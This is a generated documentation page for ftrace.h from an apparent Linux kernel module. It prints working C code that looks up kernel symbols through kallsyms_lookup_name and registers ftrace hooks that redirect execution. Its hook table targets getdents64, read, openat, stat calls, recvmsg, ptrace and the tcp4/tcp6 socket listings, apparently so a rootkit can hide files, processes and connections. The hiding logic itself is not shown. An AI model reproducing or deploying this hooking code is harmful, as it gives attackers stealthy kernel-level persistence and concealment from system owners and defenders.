ftrace.h File Reference

#include <linux/file.h>
#include <linux/ftrace.h>
#include <linux/types.h>

Include dependency graph for ftrace.h:

This graph shows which files directly or indirectly include this file:

Go to the source code of this file.

Classes
struct	ftrace_hook

Macros
#define	SYSCALL_NAME(name)   ("__x64_" name)
#define	HOOK_SYS(_name, _hook, _orig)
#define	HOOK(_name, _hook, _orig)

Functions
int	fh_install_hook (struct ftrace_hook *hook)
	Install an individual ftrace hook.
void	fh_remove_hook (struct ftrace_hook *hook)
	Remove an individual ftrace hook.
int	fh_install_hooks (struct ftrace_hook *hooks, size_t count)
	Install multiple ftrace hooks.
void	fh_remove_hooks (struct ftrace_hook *hooks, size_t count)
	Remove multiple ftrace hooks.

Variables
struct ftrace_hook	hooks []
size_t	hook_array_size
unsigned long(*)(const char *)	fh_init_kallsyms_lookup (void)

Macro Definition Documentation

HOOK

#define HOOK	(		_name,
			_hook,
			_orig
	)

Value:

    {                       \
    .name = (_name),                                    \
    .function = (_hook),                                \
    .original = (_orig),                                \
}

Definition at line 24 of file ftrace.h.

                                  {                     \
    .name = (_name),                                    \
    .function = (_hook),                                \
    .original = (_orig),                                \
}

HOOK_SYS

#define HOOK_SYS	(		_name,
			_hook,
			_orig
	)

Value:

    {                   \
    .name = SYSCALL_NAME(_name),                        \
    .function = (_hook),                                \
    .original = (_orig),                                \
}

Definition at line 18 of file ftrace.h.

                                      {                 \
    .name = SYSCALL_NAME(_name),                        \
    .function = (_hook),                                \
    .original = (_orig),                                \
}

SYSCALL_NAME

#define SYSCALL_NAME

(

name

)

("__x64_" name)

Definition at line 17 of file ftrace.h.

Function Documentation

fh_install_hook()

int fh_install_hook

(

struct ftrace_hook *

hook

)

Install an individual ftrace hook.

Parameters

hook	Pointer to an ftrace_hook structure.

Returns

0 on success, or a negative error code on failure.

Definition at line 58 of file ftrace.c.

                                              {
    int err;
    unsigned long (*kallsyms_lookup)(const char *) = fh_init_kallsyms_lookup();
 
    if (!kallsyms_lookup) {
        ERR_MSG("ftrace: unable to get kallsyms_lookup_name pointer\n");
        return -ENOENT;
    }
 
    hook->address = kallsyms_lookup(hook->name);
    if (!hook->address) {
        ERR_MSG("ftrace: unresolved symbol\n");
        return -ENOENT;
    }
 
    *((unsigned long *)hook->original) = hook->address;
 
    hook->ops.func = fh_ftrace_thunk;
    hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS | FTRACE_OPS_FL_RECURSION | FTRACE_OPS_FL_IPMODIFY;
 
    err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0);
    if (err) {
        ERR_MSG("ftrace: ftrace_set_filter_ip() failed.\n");
        return err;
    }
 
    err = register_ftrace_function(&hook->ops);
    if (err) {
        ERR_MSG("ftrace: register_ftrace_function() failed.\n");
        return err;
    }
    return 0;
}

fh_install_hooks()

int fh_install_hooks	(	struct ftrace_hook *	hooks,
		size_t	count
	)

Install multiple ftrace hooks.

Parameters

hooks	Pointer to an array of ftrace_hook structures.
count	Number of hooks in the array.

Returns

0 on success, or a negative error code on failure.

Definition at line 116 of file ftrace.c.

                                                              {
    int err;
    size_t i;
    for (i = 0; i < count; i++) {
        err = fh_install_hook(&hooks[i]);
        if (err) {
            while (i--)
                fh_remove_hook(&hooks[i]);
            return err;
        }
    }
    return 0;
}

fh_remove_hook()

void fh_remove_hook

(

struct ftrace_hook *

hook

)

Remove an individual ftrace hook.

Parameters

hook	Pointer to an ftrace_hook structure.

Definition at line 97 of file ftrace.c.

                                              {
    int err;
 
    err = unregister_ftrace_function(&hook->ops);
    if (err)
        ERR_MSG("ftrace: unregister_ftrace_function() failed.\n");
 
    err = ftrace_set_filter_ip(&hook->ops, hook->address, 1, 0);
    if (err)
        ERR_MSG("ftrace: ftrace_set_filter_ip() failed. \n");
}

fh_remove_hooks()

void fh_remove_hooks	(	struct ftrace_hook *	hooks,
		size_t	count
	)

Remove multiple ftrace hooks.

Parameters

hooks	Pointer to an array of ftrace_hook structures.
count	Number of hooks in the array.

Definition at line 136 of file ftrace.c.

                                                              {
    size_t i;
    for (i = 0; i < count; i++)
        fh_remove_hook(&hooks[i]);
}

Variable Documentation

fh_init_kallsyms_lookup

unsigned long(*)(const char *) fh_init_kallsyms_lookup(void)

(

void

)

Definition at line 33 of file ftrace.h.

hook_array_size

size_t hook_array_size

extern

Definition at line 22 of file array.c.

hooks

struct ftrace_hook hooks[]

extern

Definition at line 6 of file array.c.

                             {
    HOOK_SYS("sys_getdents64", getdents64_hook, &__orig_getdents64),
    HOOK_SYS("sys_read", read_hook, &__orig_read),
    HOOK_SYS("sys_openat", openat_hook, &__orig_openat),
    HOOK_SYS("sys_newfstatat", stat_hook, &__orig_newfstatat),
    HOOK_SYS("sys_fstat", stat_hook, &__orig_fstat),
    HOOK_SYS("sys_lstat", stat_hook, &__orig_lstat),
    HOOK_SYS("sys_stat", stat_hook, &__orig_stat),
    HOOK_SYS("sys_recvmsg", recvmsg_hook, &__orig_recvmsg),
    HOOK_SYS("sys_chdir", chdir_hook, &__orig_chdir),
    HOOK_SYS("sys_ptrace", ptrace_hook, &__orig_ptrace),
 
    HOOK("tcp4_seq_show", tcp4_seq_show_hook, &__orig_tcp4_seq_show),
    HOOK("tcp6_seq_show", tcp6_seq_show_hook, &__orig_tcp6_seq_show)
};